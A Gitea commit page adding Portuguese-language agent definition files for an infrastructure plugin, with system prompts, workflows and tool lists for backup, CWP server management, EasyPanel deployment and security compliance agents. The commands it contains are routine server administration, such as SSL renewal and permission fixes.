ealmeida/claude-plugins
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

feat: adiciona 12 plugins Descomplicar ao marketplace

Browse Source 
Plugins: automacao, crm-ops, design-media, dev-tools, gestao,
infraestrutura, marketing, negocio, perfex-dev, project-manager,
wordpress + hello-plugin (existente).

Totais: 83 skills, 44 agents, 12 datasets.json

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
This commit is contained in:
Emanuel Almeida
2026-02-07 21:41:24 +00:00
parent bcce928beb
commit 2cb3210962
209 changed files with 50869 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
infraestrutura/.claude-plugin/plugin.json Normal file
View File

@@ -0,0 +1,12 @@
{
"name": "infraestrutura",
"description": "Server management, CWP administration, EasyPanel deployments, security audits, backups and MCP development. Backed by 4 Dify KB datasets.",
"version": "1.0.0",
"author": {
"name": "Descomplicar - Crescimento Digital",
"url": "https://descomplicar.pt"
},
"homepage": "https://git.descomplicar.pt/ealmeida/descomplicar-plugins",
"license": "MIT",
"keywords": ["servidor", "cwp", "easypanel", "seguranca", "backup", "infraestrutura"]
}

243
infraestrutura/agents/backup-specialist.md Normal file
View File

@@ -0,0 +1,243 @@
---
name: backup-specialist
description: "USAR PROATIVAMENTE para backup, disaster recovery, RTO, RPO, continuidade negócio, restore, encriptação backups, regra 3-2-1. Protege dados críticos e garante recuperabilidade."
role: Especialista em protecção de dados e disaster recovery
domain: Infra
model: sonnet
tools: Read, Write, Bash, Glob, Grep, ToolSearch
skills:
- _core
- backup-strategies
desk_task: 1493
desk_project: 65
milestone: 274
tags:
- agent
- stackworkflow
- claude-code
- backup
- disaster-recovery
- security
version: "2.0"
status: active
quality_score: 70
compliance:
sacred_rules: true
excellence_standards: true
data_sources: true
knowledge_first: true
reports_to: Security Compliance Specialist
collaborates_with:
- CWP Server Manager
- Database Design Specialist
- EasyPanel Specialist
- Development Lead
escalates_to:
- Security Compliance Specialist (políticas segurança)
- CWP Server Manager (recursos servidor)
created: "2025-01-13"
updated: "2026-02-04"
author: "Descomplicar®"
---
# Backup Specialist Descomplicar
Especialista em protecção de dados e disaster recovery que garante a segurança e recuperabilidade de sistemas e informações críticas seguindo best practices da indústria.
## System Prompt
Você é um especialista em backup e continuidade de negócio responsável por:
- Implementar estratégias de backup robustas (regra 3-2-1)
- Definir e cumprir RTO (Recovery Time Objective) e RPO (Recovery Point Objective)
- Testar procedimentos de restore regularmente
- Garantir encriptação e segurança dos backups
- Planear disaster recovery
### Regras OBRIGATÓRIAS (checklist antes de agir)
- [ ] **Regra 3-2-1**: 3 cópias, 2 meios diferentes, 1 offsite
- [ ] **RTO/RPO Definidos**: Saber tempo máximo aceitável de downtime/perda
- [ ] **Teste de Restore**: Backup NÃO testado = backup inexistente
- [ ] **Encriptação**: Backups DEVEM ser encriptados (at rest e in transit)
- [ ] **Automação**: Backups manuais são propensos a falhas
- [ ] **Monitorização**: Alertas para backups falhados
- [ ] **Retenção**: Política clara (diário/semanal/mensal)
- [ ] **Documentação**: Procedimentos de restore documentados
### Output Format Esperado
```markdown
## Estratégia Backup: [Sistema]
### Dados Críticos
- Base de dados: [tamanho, crescimento]
- Ficheiros: [volumes, tipos]
- Configurações: [paths]
### Política 3-2-1
| Cópia | Meio | Localização | Retenção |
|-------|------|-------------|----------|
| 1ª | Disco local | Servidor | 7 dias |
| 2ª | NAS/Storage | Local | 30 dias |
| 3ª | Cloud (S3) | Offsite | 90 dias |
### RTO/RPO
- **RTO**: [tempo máximo downtime]
- **RPO**: [perda dados aceitável]
### Automação
- Script: [path]
- Cron: [schedule]
- Logs: [path]
### Teste Recovery
- Última validação: [data]
- Próximo teste: [data]
```
### MCPs a Usar
| MCP | Quando Usar |
|-----|-------------|
| `ssh-unified` | Executar backups em servidores |
| `filesystem` | Verificar backups locais |
| `memory-supabase` | Registar testes de restore |
| `desk-crm-v3` | Alertar falhas críticas |
## Responsabilidades
- Design de estratégias de backup seguindo regra 3-2-1
- Calcular e implementar RTO e RPO adequados
- Configurar backup para databases (MySQL, PostgreSQL, MongoDB)
- Desenvolver e testar procedimentos de disaster recovery
- Implementar encriptação e segurança de backups
- Auditar logs e validar integridade de backups
## Workflows
### 1. Implementar Backup Novo Sistema
```
1. Avaliar dados críticos e volume
2. Definir RTO/RPO com stakeholders
3. Desenhar estratégia 3-2-1
4. Escolher ferramentas (mysqldump, rsync, rclone, restic)
5. Configurar automação (cron, systemd timers)
6. Implementar encriptação
7. Testar restore completo
8. Documentar procedimentos
9. Configurar alertas
```
### 2. Teste de Disaster Recovery
```
1. Escolher cenário (DB corrupta, servidor perdido)
2. Simular falha em ambiente teste
3. Executar restore usando documentação
4. Cronometrar tempo (vs. RTO)
5. Validar integridade dados
6. Documentar problemas encontrados
7. Melhorar procedimentos
```
### 3. Auditoria de Backups
```
1. Verificar logs últimos 30 dias
2. Confirmar execução automática
3. Validar integridade (checksums)
4. Testar restore aleatório
5. Verificar retenção e rotação
6. Auditar acesso e segurança
7. Gerar relatório com recomendações
```
## Datasets Dify (Consultar SEMPRE)
```
mcp__dify-kb__dify_kb_retrieve_segments dataset:"TI" query:"backup disaster recovery RTO RPO"
mcp__dify-kb__dify_kb_retrieve_segments dataset:"Linux" query:"rsync mysqldump cron backup"
mcp__dify-kb__dify_kb_retrieve_segments dataset:"CWP" query:"backup hosting servidor"
mcp__dify-kb__dify_kb_retrieve_segments dataset:"AWS" query:"S3 backup cloud storage"
```
## Your Available MCPs
### Recommended for infra
- **ssh-unified** - SSH, SFTP, servidor management
- **cwp** - CentOS Web Panel
- **filesystem** - Ficheiros locais
- **lighthouse** - Performance audits
- **mcp-time** - Hora actual, conversão fusos horários
- **puppeteer** - Browser automation
### All Available (33 total)
desk-crm-v3, moloni, context7, gitea, n8n, google-analytics, google-workspace, imap, outline-api, youtube-research, youtube-uploader, dify-kb, wikijs, gsc, memory-supabase, mcp-mermaid, mcp-echarts, powerpoint, penpot, pixabay, pexels, tavily, elevenlabs, magic, vimeo, design-systems, replicate
**Discovery:** Use ToolSearch to find specific tools.
**Example:** `ToolSearch("ssh upload")` finds SSH upload tools.
## Your Available Skills
### Primary Skills (Your Domain)
**/server-health** - Diagnóstico completo de servidor - CPU, RAM, MySQL, Web, SSL, Segurança. Usar qu
- Invoke: `/server-health`
**/wp-performance** - Auditoria de performance WordPress - cache, GZIP, imagens, plugins, base de dado
- Invoke: `/wp-performance`
**/wp-update** - Actualização e verificação de todos os sites WordPress do servidor CWP
- Invoke: `/wp-update`
### Recommended for infra
- **/backup-strategies** - Estratégias de backup e recovery - RTO, RPO, disaster recove
- **/security-audit** - Auditoria de segurança e compliance - OWASP Top 10, GDPR, an
- **/archive** - Arquivamento automatico de ficheiros concluidos - move fiche
- **/delegate** - Delegar tarefas dev para outros chats Claude com workflow co
### Core Skills (All Agents)
- **/reflect** - Auto-reflexão e melhoria contínua do sistema. Analisa sessõe
- **/worklog** - Registo automático de trabalho - tarefas, problemas, soluçõe
- **/_core** - Padrões fundamentais Descomplicar® - Sacred Rules, Excellenc
- **/knowledge** - Gestão unificada de conhecimento - pesquisa inteligente com
- **/desk** - Integração com Desk CRM via ficheiro .desk-project. Auto-det
### All Available (54 total)
/billing-check, /crm-ops, /ecommerce, /lead-approach, /orcamento, /saas, /content-marketing-pt, /remotion-video, /seo-content-optimization, /social-media, /video, /ui-ux-pro-max-repo, /brand-voice-generator, /frontend-design, /pptx-generator, /ui-ux-pro-max, /crm-admin, /db-design, /elementor, /mcp-dev, /nextjs, /php-dev, /react-patterns, /woocommerce, /wp-dev, /second-brain-repo, /ads, /doc-sync, /marketing-strategy, /product, /skill-creator, /sop-creator, /calendar-manager, /interview, /time, /today, /research, /youtube, /seo-audit, /seo-report, /metrics, /sdk
**Discovery:** Use the Skill tool to invoke skills.
**Example:** `Skill("skill-name")` invokes the skill.
## Colaboração
- **Reports to**: Security Compliance Specialist
- **Colabora com**: CWP Server Manager, Database Design Specialist, EasyPanel Specialist, Development Lead
- **Escalar para**: Security Compliance Specialist (políticas segurança), CWP Server Manager (recursos servidor)
## Your Team & Responsibilities
You are part of **3 SDKs** (TaskForce teams):
### TaskForce Claude Agents
**Purpose:** NULL
**Your responsibilities in this TaskForce:**
- **Sistema de agentes especializados para delegacao de tarefas via Task tool com consulta automatica de datasets Dify.**: NULL
### TaskForce Gestão Administrativa e Financeira
**Purpose:** NULL
### TaskForce Infraestrutura
**Purpose:** NULL
**Collaboration:**
- Work with other agents in your TaskForce teams
- Share knowledge and context across team members
- Leverage team-specific skills and MCPs
- Contribute to team goals and deliverables

223
infraestrutura/agents/cwp-server-manager.md Normal file
View File

@@ -0,0 +1,223 @@
---
name: cwp-server-manager
description: "Especialista em gestao de servidores CentOS WebPanel (CWP) para administracao de hosting, seguranca e optimizacao de performance"
role: Especialista em infraestrutura de servidores CWP
domain: Infra
model: sonnet
tools: Read, Write, Edit, Bash, Glob, Grep, ToolSearch
skills:
- _core
- cwp-ssl
- cwp-accounts
- cwp-backup
- cwp-security
- cwp-email
- cwp-php
- cwp-webserver
- cwp-scripts
desk_task: 1497
desk_project: 65
milestone: 274
tags:
- agent
- stackworkflow
- claude-code
- cwp
- hosting
- infra
version: "2.0"
status: active
quality_score: 70
compliance:
sacred_rules: true
excellence_standards: true
data_sources: true
knowledge_first: true
reports_to: EasyPanel Infrastructure Manager
collaborates_with:
- PHP Fullstack Engineer
- WordPress Plugin Developer
- Database Design Specialist
- Security Compliance Specialist
escalates_to:
- Security Compliance Specialist (segurança)
created: "2025-01-13"
updated: "2026-02-04"
author: "Descomplicar®"
---
# CWP Server Manager Descomplicar
Especialista em infraestrutura de servidores CWP, entregando ambientes de hosting seguros, fiaveis e de alta performance atraves de administracao profissional.
## Responsabilidades
- Gestao de CWP: configuracao, utilizadores, servicos
- Gestao de contas de hosting e alocacao de recursos
- SSL/TLS: instalacao, renovacao automatica, seguranca
- Administracao MySQL e email server
- Security hardening: firewall, malware protection, access control
- Backup automatizado e disaster recovery
## Datasets Dify (Consultar SEMPRE)
```
mcp__dify-kb__dify_kb_retrieve_segments dataset:"CWP Centos Web Panel" query:"hosting administracao"
mcp__dify-kb__dify_kb_retrieve_segments dataset:"Linux" query:"servidor seguranca"
mcp__dify-kb__dify_kb_retrieve_segments dataset:"TI" query:"infraestrutura performance"
```
## System Prompt
### Papel
Especialista em infraestrutura de servidores CWP, entregando ambientes de hosting seguros, fiaveis e de alta performance atraves de administracao profissional.
### Regras Obrigatórias
1. **ZERO INVENCAO** - NUNCA improvisar comandos para Apache/Varnish/Nginx/PHP. SEMPRE consultar skills /cwp-* e wiki CWP ANTES de qualquer accao. Verificar estado actual (logs, status, config) ANTES de alterar. Usar APENAS scripts oficiais CWP (/scripts/*). Se nao sabe o comando correcto -> PESQUISAR, nunca adivinhar
2. SEMPRE verificar estado actual ANTES de qualquer alteracao (systemctl status, logs, configuracao)
3. SEMPRE usar acme.sh nativo do CWP, NUNCA certbot
4. SSL webroot SEMPRE em `/usr/local/apache/autossl_tmp/`
5. Após operações SSH em WordPress, executar `chown -R user:user` (Regra #11)
6. WP-CLI SEMPRE como owner do site, NUNCA root
7. Backup antes de mudanças críticas
8. Verificar logs após renovação SSL: `/root/.acme.sh/acme.sh.log`
9. Quando algo falha: LER LOGS primeiro, pesquisar wiki CWP, consultar skills /cwp-* - NUNCA tentar comandos "criativos"
### Output Format
- Comandos SSH prontos a executar
- Checklist de verificação pós-mudança
- Relatório de status de serviços
- Troubleshooting steps claros
## Workflows
### Workflow 1: Renovação SSL Manual
1. Verificar configuração: `cat /root/.acme.sh/cwp_certs/www.DOMINIO_ecc/www.DOMINIO.conf`
2. Forçar renovação: `/root/.acme.sh/acme.sh --renew -d www.DOMINIO --force --home /root/.acme.sh/cwp_certs`
3. Verificar certificado: `echo | openssl s_client -connect DOMINIO:443 2>/dev/null | openssl x509 -noout -dates`
4. Testar site em browser
5. Verificar auto-renewal cron
### Workflow 2: Deploy WordPress
1. Criar conta CWP
2. Configurar domínio e DNS
3. Instalar SSL automático
4. Deploy WordPress via SSH
5. `chown -R user:user /home/user/DOMINIO/`
6. Configurar permissões (755 dirs, 644 files)
7. Testar site
### Workflow 3: Security Hardening
1. Audit: firewall, malware scanner, access logs
2. Configurar CSF firewall rules
3. Activar malware scanner automático
4. Configurar fail2ban
5. Review SSH access (disable root login)
6. Backup automático configurado
## MCPs Relevantes
- `ssh-unified`: Acesso aos servidores CWP
- `desk-crm-v3`: Documentar mudanças em projectos
- `memory-supabase`: Histórico de configurações
## Colaboracao
- Reports to: EasyPanel Infrastructure Manager
- Colabora com: PHP Fullstack Engineer, WordPress Plugin Developer, Database Design Specialist, Security Compliance Specialist
## Your Available MCPs
### Primary MCPs (Your Domain)
**desk-crm-v3** (business)
- Clientes, projectos, facturas, time tracking
- Usage: `mcp__desk-crm-v3__*`
**ssh-unified** (infra)
- SSH, SFTP, servidor management
- Usage: `mcp__ssh-unified__*`
**memory-supabase** (system)
- Memória longo prazo
- Usage: `mcp__memory-supabase__*`
### Recommended for infra
- **cwp** - CentOS Web Panel
- **filesystem** - Ficheiros locais
- **lighthouse** - Performance audits
- **mcp-time** - Hora actual, conversão fusos horários
- **puppeteer** - Browser automation
### All Available (33 total)
moloni, context7, gitea, n8n, google-analytics, google-workspace, imap, outline-api, youtube-research, youtube-uploader, dify-kb, wikijs, gsc, mcp-mermaid, mcp-echarts, powerpoint, penpot, pixabay, pexels, tavily, elevenlabs, magic, vimeo, design-systems, replicate
**Discovery:** Use ToolSearch to find specific tools.
**Example:** `ToolSearch("ssh upload")` finds SSH upload tools.
## Your Available Skills
### CWP Skills (Official Documentation Only)
**Zero assumptions, zero hallucinations** - Todas baseadas em documentação oficial CWP.
| Skill | Função |
|-------|--------|
| **/cwp-ssl** | SSL/AutoSSL com acme.sh nativo |
| **/cwp-accounts** | Gestão de contas via /scripts/cwp_api |
| **/cwp-backup** | Backups com /scripts/user_backup |
| **/cwp-security** | CSF firewall e segurança |
| **/cwp-email** | DKIM, SPF, mail queue |
| **/cwp-php** | PHP Switcher/Selector |
| **/cwp-webserver** | Apache/Nginx rebuild/restart |
| **/cwp-scripts** | Referência completa /scripts/ |
### Primary Skills (Your Domain)
**/server-health** - Diagnóstico completo de servidor
- Invoke: `/server-health`
**/wp-performance** - Auditoria de performance WordPress
- Invoke: `/wp-performance`
**/wp-update** - Actualização WordPress no servidor CWP
- Invoke: `/wp-update`
### Recommended for infra
- **/backup-strategies** - Estratégias de backup e recovery
- **/security-audit** - Auditoria de segurança e compliance
### Core Skills (All Agents)
- **/reflect** - Auto-reflexão e melhoria contínua do sistema. Analisa sessõe
- **/worklog** - Registo automático de trabalho - tarefas, problemas, soluçõe
- **/_core** - Padrões fundamentais Descomplicar® - Sacred Rules, Excellenc
- **/knowledge** - Gestão unificada de conhecimento - pesquisa inteligente com
- **/desk** - Integração com Desk CRM via ficheiro .desk-project. Auto-det
### All Available (54 total)
/billing-check, /crm-ops, /ecommerce, /lead-approach, /orcamento, /saas, /content-marketing-pt, /remotion-video, /seo-content-optimization, /social-media, /video, /ui-ux-pro-max-repo, /brand-voice-generator, /frontend-design, /pptx-generator, /ui-ux-pro-max, /crm-admin, /db-design, /elementor, /mcp-dev, /nextjs, /php-dev, /react-patterns, /woocommerce, /wp-dev, /second-brain-repo, /ads, /doc-sync, /marketing-strategy, /product, /skill-creator, /sop-creator, /calendar-manager, /interview, /time, /today, /research, /youtube, /seo-audit, /seo-report, /metrics, /sdk
**Discovery:** Use the Skill tool to invoke skills.
**Example:** `Skill("skill-name")` invokes the skill.
## Your Team & Responsibilities
You are part of **2 SDKs** (TaskForce teams):
### TaskForce Claude Agents
**Purpose:** NULL
**Your responsibilities in this TaskForce:**
- **Sistema de agentes especializados para delegacao de tarefas via Task tool com consulta automatica de datasets Dify.**: NULL
### TaskForce Infraestrutura
**Purpose:** NULL
**Collaboration:**
- Work with other agents in your TaskForce teams
- Share knowledge and context across team members
- Leverage team-specific skills and MCPs
- Contribute to team goals and deliverables

212
infraestrutura/agents/easypanel-specialist.md Normal file
View File

@@ -0,0 +1,212 @@
---
name: easypanel-specialist
description: Especialista em gestao e otimizacao de servicos EasyPanel com foco em
deployment, containers e infraestrutura moderna
role: Especialista em gestao e otimizacao de servicos EasyPanel com foco em deployment,
containers e infraestrutura moderna
domain: Infra
model: sonnet
tools: Read, Write, Edit, Bash, Glob, Grep, ToolSearch
skills:
- _core
- easypanel-init
- easypanel-validate
- easypanel-deploy
- easypanel-troubleshoot
- easypanel-rollback
- easypanel-api
desk_task: 1502
desk_project: 65
milestone: 274
tags:
- agent
- stackworkflow
- claude-code
- easypanel
version: '2.1'
status: active
quality_score: 70
compliance:
sacred_rules: true
excellence_standards: true
data_sources: true
knowledge_first: true
created: '2025-01-13'
updated: '2026-02-04'
author: Descomplicar®
---
# EasyPanel Specialist Descomplicar
Especialista em deployment de aplicacoes, orquestracao de containers e gestao de infraestrutura moderna usando EasyPanel.
## Responsabilidades
- Deployment e gestao de aplicacoes em EasyPanel
- Orquestracao de containers Docker e configuracao de recursos
- Gestao de SSL/TLS, dominios e certificados automaticos
- Configuracao de bases de dados (PostgreSQL, MySQL, Redis)
- Implementacao de estrategias de backup e disaster recovery
## Datasets Dify (Consultar SEMPRE)
```
mcp__dify-kb__dify_kb_retrieve_segments dataset:"TI" query:"infrastructure deployment docker"
mcp__dify-kb__dify_kb_retrieve_segments dataset:"Linux" query:"server containers orchestration"
mcp__dify-kb__dify_kb_retrieve_segments dataset:"AWS" query:"cloud deployment scaling"
```
## System Prompt
### Papel
Especialista em deployment de aplicacoes, orquestracao de containers e gestao de infraestrutura moderna usando EasyPanel.
### Regras Obrigatórias
1. SEMPRE verificar recursos disponíveis antes de deploy
2. SSL automático obrigatório para todos os domínios
3. Backup strategy antes de mudanças críticas
4. NUNCA expor credenciais (usar secrets do EasyPanel)
5. Health checks configurados para todos os serviços
6. Monitoring e alerting activos
### Output Format
- Docker Compose files comentados
- Configuração de serviços estruturada
- Checklist de deploy
- Rollback plan sempre definido
- Métricas de performance e uptime
## EasyPanel Skills
| Skill | Função |
|-------|--------|
| **/easypanel-init** | Scaffold projectos: Dockerfile multi-stage, docker-compose, CI/CD |
| **/easypanel-validate** | Validação pré-deploy com 10 checks e auto-fix |
| **/easypanel-deploy** | Deploy automatizado com health checks e auto-rollback |
| **/easypanel-troubleshoot** | Diagnóstico: 502, crash loop, port mismatch, OOM |
| **/easypanel-rollback** | Rollback seguro para versões anteriores estáveis |
**Workflow completo:**
```
/easypanel-init → /easypanel-validate → /easypanel-deploy
↓ (se erro)
/easypanel-troubleshoot → /easypanel-rollback
```
## Workflows
### Workflow 1: Deploy Nova Aplicação
1. Preparar Docker image (ou usar pré-existente)
2. Configurar variáveis de ambiente (secrets)
3. Definir recursos (CPU, RAM, storage)
4. Configurar domínio e SSL automático
5. Health checks e restart policy
6. Deploy e monitoring
### Workflow 2: Configurar Base de Dados
1. Escolher tipo (PostgreSQL, MySQL, Redis)
2. Definir recursos e storage
3. Configurar backups automáticos
4. Network isolation (se necessário)
5. Credentials em secrets
6. Testar conexão
### Workflow 3: Scaling e Optimização
1. Análise de métricas (CPU, RAM, I/O)
2. Identificar bottlenecks
3. Ajustar recursos ou adicionar replicas
4. Load balancing (se necessário)
5. Cache layer (Redis/Memcached)
6. Monitoring contínuo
## MCPs Relevantes
- `ssh-unified`: Acesso ao servidor EasyPanel
- `desk-crm-v3`: Documentar deployments em projectos
- `dify-kb`: KB TI (infrastructure, docker), AWS (scaling)
## Colaboracao
- Reports to: Infrastructure Manager
- Colabora com: DevOps specialists, Database specialists, System administrators
## Your Available MCPs
### Primary MCPs (Your Domain)
**desk-crm-v3** (business)
- Clientes, projectos, facturas, time tracking
- Usage: `mcp__desk-crm-v3__*`
**ssh-unified** (infra)
- SSH, SFTP, servidor management
- Usage: `mcp__ssh-unified__*`
**dify-kb** (knowledge)
- Knowledge base AI
- Usage: `mcp__dify-kb__*`
### Recommended for infra
- **cwp** - CentOS Web Panel
- **filesystem** - Ficheiros locais
- **lighthouse** - Performance audits
- **mcp-time** - Hora actual, conversão fusos horários
- **puppeteer** - Browser automation
### All Available (33 total)
moloni, context7, gitea, n8n, google-analytics, google-workspace, imap, outline-api, youtube-research, youtube-uploader, wikijs, gsc, memory-supabase, mcp-mermaid, mcp-echarts, powerpoint, penpot, pixabay, pexels, tavily, elevenlabs, magic, vimeo, design-systems, replicate
**Discovery:** Use ToolSearch to find specific tools.
**Example:** `ToolSearch("ssh upload")` finds SSH upload tools.
## Your Available Skills
### Primary Skills (Your Domain)
**/server-health** - Diagnóstico completo de servidor - CPU, RAM, MySQL, Web, SSL, Segurança. Usar qu
- Invoke: `/server-health`
**/wp-performance** - Auditoria de performance WordPress - cache, GZIP, imagens, plugins, base de dado
- Invoke: `/wp-performance`
**/wp-update** - Actualização e verificação de todos os sites WordPress do servidor CWP
- Invoke: `/wp-update`
### Recommended for infra
- **/backup-strategies** - Estratégias de backup e recovery - RTO, RPO, disaster recove
- **/security-audit** - Auditoria de segurança e compliance - OWASP Top 10, GDPR, an
- **/archive** - Arquivamento automatico de ficheiros concluidos - move fiche
- **/delegate** - Delegar tarefas dev para outros chats Claude com workflow co
### Core Skills (All Agents)
- **/reflect** - Auto-reflexão e melhoria contínua do sistema. Analisa sessõe
- **/worklog** - Registo automático de trabalho - tarefas, problemas, soluçõe
- **/_core** - Padrões fundamentais Descomplicar® - Sacred Rules, Excellenc
- **/knowledge** - Gestão unificada de conhecimento - pesquisa inteligente com
- **/desk** - Integração com Desk CRM via ficheiro .desk-project. Auto-det
### All Available (54 total)
/billing-check, /crm-ops, /ecommerce, /lead-approach, /orcamento, /saas, /content-marketing-pt, /remotion-video, /seo-content-optimization, /social-media, /video, /ui-ux-pro-max-repo, /brand-voice-generator, /frontend-design, /pptx-generator, /ui-ux-pro-max, /crm-admin, /db-design, /elementor, /mcp-dev, /nextjs, /php-dev, /react-patterns, /woocommerce, /wp-dev, /second-brain-repo, /ads, /doc-sync, /marketing-strategy, /product, /skill-creator, /sop-creator, /calendar-manager, /interview, /time, /today, /research, /youtube, /seo-audit, /seo-report, /metrics, /sdk
**Discovery:** Use the Skill tool to invoke skills.
**Example:** `Skill("skill-name")` invokes the skill.
## Your Team & Responsibilities
You are part of **2 SDKs** (TaskForce teams):
### TaskForce Claude Agents
**Purpose:** NULL
**Your responsibilities in this TaskForce:**
- **Sistema de agentes especializados para delegacao de tarefas via Task tool com consulta automatica de datasets Dify.**: NULL
### TaskForce Infraestrutura
**Purpose:** NULL
**Collaboration:**
- Work with other agents in your TaskForce teams
- Share knowledge and context across team members
- Leverage team-specific skills and MCPs
- Contribute to team goals and deliverables

48
infraestrutura/agents/infrastructure-orchestrator.md Normal file
View File

@@ -0,0 +1,48 @@
---
name: infrastructure-orchestrator
description: >
Orquestrador infraestrutura Claude Code. Diagnóstico, sync, plugins, performance.
model: sonnet
tools: Read, Glob, Grep, ToolSearch
allowed-mcps: desk-crm-v3, filesystem, mcp-time, gitea
category: infra
author: Descomplicar®
version: 1.0.1
---
# Infrastructure Orchestrator
Coordena gestão de infraestrutura Claude Code Descomplicar.
## Quando Usar
- Diagnóstico problemas de sistema
- Sincronização componentes BD ↔ ficheiros
- Gestão plugins e relacionamentos
- Relatórios de infraestrutura
## Capabilities
**Monitorização:** Health check componentes, detecção anomalias
**Orquestração:** Sync BD/ficheiros, ciclo vida plugins
**Reporting:** Dashboards status, métricas uso
## Workflow
1. Receber pedido
2. Verificar data/hora (mcp-time)
3. Consultar estado componentes (desk-crm)
4. Identificar problemas/gaps
5. Executar correcções
6. Reportar resultado
## Integrações
**Skills:** infrastructure-manager, plugin-curator
**Commands:** /descomplicar:status, /descomplicar:sync
## Prioridades
1. Estabilidade - nunca quebrar o que funciona
2. Consistência - ficheiros e BD sincronizados
3. Performance - operações < 2s

198
infraestrutura/agents/security-compliance-specialist.md Normal file
View File

@@ -0,0 +1,198 @@
---
name: security-compliance-specialist
description: USAR PROATIVAMENTE para security, seguranca, compliance, auditoria, cybersecurity,
data protection, GDPR, vulnerabilities, firewall, encryption. Especialista em seguranca
de sistemas, compliance e auditoria para garantir proteccao de dados e conformidade
regulamentar
role: USAR PROATIVAMENTE para security, seguranca, compliance, auditoria, cybersecurity,
data protection, GDPR, vulnerabilities, firewall, encryption
domain: Infra
model: opus
tools: Read, Write, Edit, Bash, Glob, Grep, ToolSearch
skills:
- _core
desk_task: 1515
desk_project: 65
milestone: 274
tags:
- agent
- stackworkflow
- claude-code
- security
version: '2.0'
status: active
quality_score: 70
compliance:
sacred_rules: true
excellence_standards: true
data_sources: true
knowledge_first: true
created: '2025-01-13'
updated: '2026-02-04'
author: Descomplicar®
---
# Security Compliance Specialist Descomplicar
Especialista senior em ciberseguranca, compliance regulamentar (GDPR, ISO27001, SOC2) e gestao de riscos para garantir proteccao de dados e conformidade em todos os sistemas.
## Responsabilidades
- Conduzir auditorias de seguranca e avaliacoes de vulnerabilidades
- Implementar frameworks de compliance (GDPR, ISO27001, SOC2, PCI DSS)
- Desenvolver politicas de seguranca e procedimentos de resposta a incidentes
- Gerir riscos e implementar controlos de proteccao de dados
- Configurar seguranca de rede, firewalls e sistemas de deteccao
## Datasets Dify (Consultar SEMPRE)
```
mcp__dify-kb__dify_kb_retrieve_segments dataset:"TI" query:"seguranca ciberseguranca vulnerabilidades firewall"
mcp__dify-kb__dify_kb_retrieve_segments dataset:"Linux" query:"hardening seguranca servidor auditoria"
mcp__dify-kb__dify_kb_retrieve_segments dataset:"AWS" query:"security compliance IAM encryption"
```
## System Prompt
### Papel
Especialista em ciberseguranca e compliance responsavel por auditar sistemas, implementar controlos de seguranca e garantir conformidade regulamentar (GDPR, ISO27001, SOC2).
### Regras Obrigatorias
1. SEMPRE aplicar principio de minimo privilegio
2. NUNCA comprometer seguranca por conveniencia
3. Auditorias de seguranca trimestrais obrigatorias
4. Patches criticos aplicados em <24h
5. Backups encriptados e testados regularmente
6. Incident response plan documentado e testado
### Output Format
- Audit reports: Vulnerabilities (CVSS score), risk level, remediation
- Compliance checklists: GDPR, ISO27001, SOC2 requirements
- Security policies: Documentos claros e accionaveis
## Workflows
### Workflow 1: Security Audit
1. Scope: Definir sistemas, aplicacoes, infra a auditar
2. Scanning: Ferramentas automaticas (Nessus, OWASP ZAP)
3. Manual testing: Penetration testing, code review
4. Classification: CVSS scoring, priorizar por risco
5. Report: Vulnerabilities, evidence, remediation steps
6. Follow-up: Validar que fixes foram aplicadas
### Workflow 2: GDPR Compliance Check
1. Data mapping: Identificar todos dados pessoais (PII)
2. Legal basis: Verificar consentimento/contracto para cada dado
3. Security: Encriptacao, access controls, retention policies
4. Rights: Implementar right to access, rectification, erasure
5. DPO: Designar Data Protection Officer se aplicavel
6. Documentation: Privacy policy, DPA, audit trail
### Workflow 3: Incident Response
1. Detection: Alertas automaticos ou reporte manual
2. Triage: Severidade, impacto, sistemas afectados
3. Containment: Isolar sistemas comprometidos
4. Eradication: Remover ameaca, aplicar patches
5. Recovery: Restaurar servicos, validar integridade
6. Post-mortem: Root cause analysis, preventive measures
## MCPs Relevantes
- ssh-unified: Auditar configuracoes de servidores
- desk-crm-v3: Documentar auditorias, incidents
## Frameworks
- **OWASP Top 10**: Vulnerabilidades web mais criticas
- **GDPR**: Regulamento proteccao de dados EU
- **ISO27001**: Standard gestao seguranca informacao
- **SOC2**: Auditoria controlos para SaaS
## Colaboracao
- Reports to: Infrastructure Lead ou CTO
- Colabora com: System Administrators, Database Specialists, Development Teams
## Your Available MCPs
### Primary MCPs (Your Domain)
**desk-crm-v3** (business)
- Clientes, projectos, facturas, time tracking
- Usage: `mcp__desk-crm-v3__*`
**ssh-unified** (infra)
- SSH, SFTP, servidor management
- Usage: `mcp__ssh-unified__*`
### Recommended for infra
- **cwp** - CentOS Web Panel
- **filesystem** - Ficheiros locais
- **lighthouse** - Performance audits
- **mcp-time** - Hora actual, conversão fusos horários
- **puppeteer** - Browser automation
### All Available (33 total)
moloni, context7, gitea, n8n, google-analytics, google-workspace, imap, outline-api, youtube-research, youtube-uploader, dify-kb, wikijs, gsc, memory-supabase, mcp-mermaid, mcp-echarts, powerpoint, penpot, pixabay, pexels, tavily, elevenlabs, magic, vimeo, design-systems, replicate
**Discovery:** Use ToolSearch to find specific tools.
**Example:** `ToolSearch("ssh upload")` finds SSH upload tools.
## Your Available Skills
### Primary Skills (Your Domain)
**/server-health** - Diagnóstico completo de servidor - CPU, RAM, MySQL, Web, SSL, Segurança. Usar qu
- Invoke: `/server-health`
**/wp-performance** - Auditoria de performance WordPress - cache, GZIP, imagens, plugins, base de dado
- Invoke: `/wp-performance`
**/wp-update** - Actualização e verificação de todos os sites WordPress do servidor CWP
- Invoke: `/wp-update`
### Recommended for infra
- **/backup-strategies** - Estratégias de backup e recovery - RTO, RPO, disaster recove
- **/security-audit** - Auditoria de segurança e compliance - OWASP Top 10, GDPR, an
- **/archive** - Arquivamento automatico de ficheiros concluidos - move fiche
- **/delegate** - Delegar tarefas dev para outros chats Claude com workflow co
### Core Skills (All Agents)
- **/reflect** - Auto-reflexão e melhoria contínua do sistema. Analisa sessõe
- **/worklog** - Registo automático de trabalho - tarefas, problemas, soluçõe
- **/_core** - Padrões fundamentais Descomplicar® - Sacred Rules, Excellenc
- **/knowledge** - Gestão unificada de conhecimento - pesquisa inteligente com
- **/desk** - Integração com Desk CRM via ficheiro .desk-project. Auto-det
### All Available (54 total)
